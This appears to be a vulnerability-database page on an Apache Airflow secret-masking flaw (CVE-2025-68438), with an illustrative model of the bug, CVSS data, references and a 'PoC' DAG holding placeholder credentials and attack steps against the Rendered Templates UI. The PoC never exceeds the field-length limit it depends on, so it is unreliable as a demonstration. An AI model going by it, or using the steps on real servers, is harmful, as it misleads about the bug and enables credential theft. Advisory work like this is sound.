Security Vulnerability Report
CVE-2025-68438 CVSS 7.5 HIGH

CVE-2025-68438

Published: 2026-01-16 11:16:04
Last Modified: 2026-01-21 13:44:44

Description

In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue.
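A simplified model of the masking gap described above, added here as an illustration and not taken from Airflow's source. `Masker`, `shared`, `serialize_vulnerable`, `serialize_fixed`, the 40-character limit and the sample secret are all constructed for the example.

```python
import re

MAX_LEN = 40  # constructed stand-in for [core] max_templated_field_length


# Toy masker: replaces every registered literal with ***.
class Masker:
    def __init__(self):
        self.patterns = set()

    def add_mask(self, secret):
        self.patterns.add(secret)

    def redact(self, text):
        if not self.patterns:
            return text
        ordered = sorted(self.patterns, key=len, reverse=True)
        return re.sub("|".join(map(re.escape, ordered)), "***", text)


shared = Masker()  # process-wide instance that user code registers secrets with
mask_secret = shared.add_mask  # toy counterpart of the user-facing mask_secret()


def serialize_vulnerable(rendered, limit=MAX_LEN):
    """Over-long fields go through a fresh masker that has no user patterns."""
    if len(rendered) <= limit:
        return shared.redact(rendered)
    return Masker().redact(rendered)[:limit] + "..."


def serialize_fixed(rendered, limit=MAX_LEN):
    """Redact with the shared masker first, then truncate for display."""
    redacted = shared.redact(rendered)
    return redacted if len(redacted) <= limit else redacted[:limit] + "..."


def demo():
    mask_secret("tok_constructed_123")  # constructed sample secret
    short = "token=tok_constructed_123"
    long_field = "Authorization: tok_constructed_123 https://example.invalid/api/v1/items"
    return {
        "short": serialize_vulnerable(short),
        "long_vulnerable": serialize_vulnerable(long_field),
        "long_fixed": serialize_fixed(long_field),
    }


if __name__ == "__main__":
    print(demo())
```

The short field is masked in both paths; only the over-long field, which takes the branch with the unconfigured masker, keeps the registered secret in its displayed text.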

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow < 3.1.6
All versions of the Apache Airflow 2.x series (may be affected under specific configurations)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-68438 PoC - Apache Airflow Sensitive Information Exposure
# This PoC demonstrates how sensitive data can be exposed in Rendered Templates UI
from airflow import DAG
from airflow.operators.python import PythonOperator
# mask_secret is not part of airflow.utils.helpers; on Airflow 3.x it is
# imported from airflow.sdk.log (airflow.utils.log.secrets_masker on 2.x).
from airflow.sdk.log import mask_secret

# Register custom sensitive information for masking
# In vulnerable versions, this pattern won't be properly masked
mask_secret('my_api_key_12345')
mask_secret('super_secret_token_abcdef')


def process_data():
    # Simulate processing with sensitive credentials
    config = {
        'api_key': 'my_api_key_12345',
        'db_password': 'database_secret_pass',
        'oauth_token': 'super_secret_token_abcdef',
        'aws_access_key': 'AKIAIOSFODNN7EXAMPLE',
        'username': 'admin',
        'password': 'P@ssw0rd123!'
    }
    # Template rendering happens here
    template_string = """
    Connection Configuration:
    API Key: {{ params.api_key }}
    DB Password: {{ params.db_password }}
    OAuth Token: {{ params.oauth_token }}
    AWS Key: {{ params.aws_access_key }}
    User: {{ params.username }}
    Pass: {{ params.password }}
    """
    return template_string


# Plain dict literals here: doubled braces would build a set containing a
# dict and raise TypeError. `schedule` replaces the removed `schedule_interval`.
with DAG('sensitive_data_exposure_dag',
         default_args={'owner': 'airflow'},
         schedule=None,
         catchup=False) as dag:
    expose_sensitive = PythonOperator(
        task_id='expose_sensitive_data',
        python_callable=process_data,
        params={
            'api_key': 'my_api_key_12345',
            'db_password': 'database_secret_pass',
            'oauth_token': 'super_secret_token_abcdef',
            'aws_access_key': 'AKIAIOSFODNN7EXAMPLE',
            'username': 'admin',
            'password': 'P@ssw0rd123!'
        }
    )

# Attack Vector:
# 1. Access Airflow Web UI at /render/{dag_id}/{task_id}/{execution_date}
# 2. When template length exceeds max_templated_field_length (default: 4096 chars)
# 3. Sensitive values registered via mask_secret() will be exposed in plaintext
# 4. Attacker can extract credentials without authentication
```

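References

https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/01/15/5 (Mailing List, Third Party Advisory)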
